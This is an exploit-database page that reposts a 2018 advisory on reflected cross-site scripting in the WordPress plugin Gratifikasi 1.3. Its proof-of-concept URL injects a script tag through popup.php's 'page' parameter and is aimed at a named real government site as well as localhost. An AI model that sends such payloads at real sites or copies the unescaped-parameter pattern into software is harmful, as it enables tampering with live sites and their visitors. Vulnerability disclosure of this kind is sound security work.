Advertisement






WordPress Plugin Gratifikasi 1.3 Cross Site Scripting (XSS)

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2018-04-10
CPE
cpe:cpe:/a:wordpress:gratifikasi:1.3
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018040083

Below is a copy:

WordPress Plugin Gratifikasi 1.3 Cross Site Scripting (XSS)
[+] Title: WordPress Gratifikasi Plugin Cross Site Scripting (XSS)
[+] Version: 1.3
[+] Author: abaykandotcom
[+] Tested on: MacOSX
[+] Vulnerable File: popup.php

Description
------------------------------------------
This plugin is used/developed by (i'm not sure yet) Indonesia's Corruption Eradication Commission (Indonesian: Komisi Pemberantasan Korupsi), abbreviated as KPK, is a government agency established to fight corruption.


Proof of Concept
------------------------------------------
The vulnerability can be exploited by using the following url:
http://127.0.0.1/wp-content/themes/gratifikasi/popup.php?page=[XSS]
https://kpk.go.id/gratifikasi/wp-content/themes/gratifikasi/popup.php?page=<script>alert('XSS by abaykandotcom');</script>


Best regards,
Abay.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.